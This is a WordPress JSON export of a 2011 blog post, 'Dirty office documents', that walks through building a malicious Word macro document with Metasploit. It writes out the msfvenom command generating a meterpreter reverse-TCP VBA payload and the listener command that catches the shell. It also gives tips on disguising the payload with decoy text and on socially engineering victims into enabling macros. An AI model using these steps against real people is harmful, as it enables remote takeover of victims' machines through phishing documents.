{"id":256,"date":"2011-12-14T17:30:32","date_gmt":"2011-12-14T16:30:32","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=256"},"modified":"2012-03-13T12:49:31","modified_gmt":"2012-03-13T11:49:32","slug":"dirty-office-doucments","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2011\/12\/14\/dirty-office-doucments\/","title":{"rendered":"Dirty office documents"},"content":{"rendered":"<p>So you want\/need a malicious word document in order to own a target, step in metasploit.<\/p>\n<p>The first thing you&#8217;ll need to do is create the code that you&#8217;ll copy&#038;paste into your word document.<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\">.<span class=\"sy0\">\/<\/span>msfvenom <span class=\"re5\">-p<\/span> windows<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>reverse_tcp <span class=\"re2\">LHOST<\/span>=192.168.0.1 <span class=\"re2\">LPORT<\/span>=<span class=\"nu0\">4444<\/span> <span class=\"re5\">-f<\/span> vba <span class=\"sy0\">&gt;<\/span> vbcode.txt<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>The output will contain 2 blocks of code; the macro and the data.<\/p>\n<p>Open a new word document and Press Alt+F11 in order to open &#8220;Microsoft Visual Basic Editor&#8221;, double click the &#8220;ThisDocument&#8221; in the Project window in the upper left. Paste the macro code from the msfvenom output here, then press Alt+Q to close the vb editor.<\/p>\n<p>Now paste the data section from the msfvenom output into the main body of the word document. None of the code will make sense, it&#8217;s not meant to; it&#8217;s encoded!<\/p>\n<p>Now you need to save the document ready to send to the victim:<\/p>\n<ul>\n<li>Office2007 &#8211; save as a Word Macro-Enabled Document (*.docm)<\/li>\n<li>Office2003 &#8211; save as a standard word document (*.doc)<\/li>\n<\/ul>\n<p>Now set up your metasploit listener and wait for the victim to open the document.<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\">.<span class=\"sy0\">\/<\/span>msfcli exploit<span class=\"sy0\">\/<\/span>multi<span class=\"sy0\">\/<\/span>handler <span class=\"re2\">PAYLOAD<\/span>=windows<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>reverse_tcp <span class=\"re2\">LHOST<\/span>=192.168.0.1 <span class=\"re2\">LPORT<\/span>=<span class=\"nu0\">4444<\/span> E<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>You might be thinking that dropping the encoded data in the document will be obvious to a user that &#8220;something smells fishy&#8221;, the simple way around this is to put real looking data at the top of the document. The malious data section must be at the end of the document.<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2011\/12\/dirtydocument1.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2011\/12\/dirtydocument1-150x150.jpg\" alt=\"\" title=\"dirtydocument1\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-261\" \/><\/a><\/p>\n<p><strong>Caveat:<\/strong> Office 2007 victims will need to enable the macro before they the malicious code will execute. Maybe a little more social engineering will trick them into enabling the content?<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2011\/12\/dirtydocument2.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2011\/12\/dirtydocument2-150x150.jpg\" alt=\"\" title=\"dirtydocument2\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-264\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>So you want\/need a malicious word document in order to own a target, step in metasploit. The first thing you&#8217;ll need to do is create the code that you&#8217;ll copy&#038;paste into your word document. 1.\/msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f vba &gt; vbcode.txt The output will contain 2 blocks of code; the macro and the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3,64,1],"tags":[456,47,102,98,101,100,99],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/256"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=256"}],"version-history":[{"count":10,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/256\/revisions"}],"predecessor-version":[{"id":470,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/256\/revisions\/470"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=256"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=256"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=256"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}